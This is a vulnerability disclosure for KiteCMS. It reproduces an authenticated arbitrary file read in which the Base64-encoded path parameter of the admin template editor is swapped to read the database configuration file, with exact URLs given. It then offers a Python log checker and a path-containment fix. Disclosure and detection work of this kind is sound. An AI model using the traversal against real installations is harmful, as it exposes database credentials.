vendor: https://github.com/Kitesky/KiteCMS
Vulnerability position: ip/index.php/admin/template/filelist.html
Log in to the backend.
Visit http://ip/index.php/admin/template/filelist.html to open the template module page.
Click to edit. It jumps to another page ---> http://192.168.1.128/index.php/admin/template/fileedit.html?path=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3RoZW1lL2NvbXBhbnkvYmFzZS5odG1s&name=YmFzZS5odG1s
By triggering an error, we find that the path and name parameters are Base64-encoded.
path=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3RoZW1lL2NvbXBhbnkvYmFzZS5odG1s ---> D:/phpStudy/PHPTutorial/WWW/theme/company/base.html
name=YmFzZS5odG1s ---> base.html
We found the repository of the CMS on GitHub and inferred the local path of its database configuration file.
The local path of the CMS database configuration file: D:\phpStudy\PHPTutorial\WWW\config\database.php
We encode the path with Base64 ---> RDpccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXGNvbmZpZ1xkYXRhYmFzZS5waHA=
Then append the encoded path to the URL: http://ip/index.php/admin/template/fileedit.html?path=RDpccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXGNvbmZpZ1xkYXRhYmFzZS5waHA=&name=ZGF0YWJhc2UucGhw
On accessing it, we found that the database configuration file of the CMS was successfully read.
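
A defender-side check for the issue described above, as an added example (not code from KiteCMS or from the original report): it decodes the Base64 path parameter of fileedit.html requests found in an access log and flags any whose normalised path falls outside the template directory. The theme root, the log line format and the sample lines are assumptions constructed from the values shown in the report.

```python
import base64
import ntpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the template root, taken from the decoded path shown in the report.
THEME_ROOT = "D:/phpStudy/PHPTutorial/WWW/theme"
ENDPOINT = "/index.php/admin/template/fileedit.html"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_path(value):
    """Base64-decode the path parameter; None if it is not valid Base64/UTF-8."""
    try:  # parse_qs turns '+' into ' ', so restore it before strict decoding
        return base64.b64decode(value.replace(" ", "+"), validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def inside_root(path, root=THEME_ROOT):
    """True only if the normalised Windows path (either separator) stays under root."""
    norm = ntpath.normcase(ntpath.normpath(path))
    base = ntpath.normcase(ntpath.normpath(root))
    return norm == base or norm.startswith(base + "\\")

def classify(target):
    """Return 'ignore', 'ok', 'malformed' or 'outside-root' for one request target."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return "ignore"
    values = parse_qs(parts.query).get("path")
    decoded = decode_path(values[0]) if values else None
    if decoded is None:
        return "malformed"
    return "ok" if inside_root(decoded) else "outside-root"

def flag(log_lines):
    """Return (request target, verdict) for each fileedit request that is not 'ok'."""
    targets = (m.group(1) for m in map(REQUEST.search, log_lines) if m)
    return [(t, v) for t in targets if (v := classify(t)) not in ("ignore", "ok")]

# Constructed sample access-log lines using the two path values from the report.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php/admin/template/fileedit.html?path=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3RoZW1lL2NvbXBhbnkvYmFzZS5odG1s&name=YmFzZS5odG1s HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php/admin/template/fileedit.html?path=RDpccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXGNvbmZpZ1xkYXRhYmFzZS5waHA=&name=ZGF0YWJhc2UucGhw HTTP/1.1" 200 2048',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php/admin/template/filelist.html HTTP/1.1" 200 900',
]
```

The same containment test (normalise the decoded path, then compare it against the template root) is what the fileedit handler needs on the server side before it opens the file.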





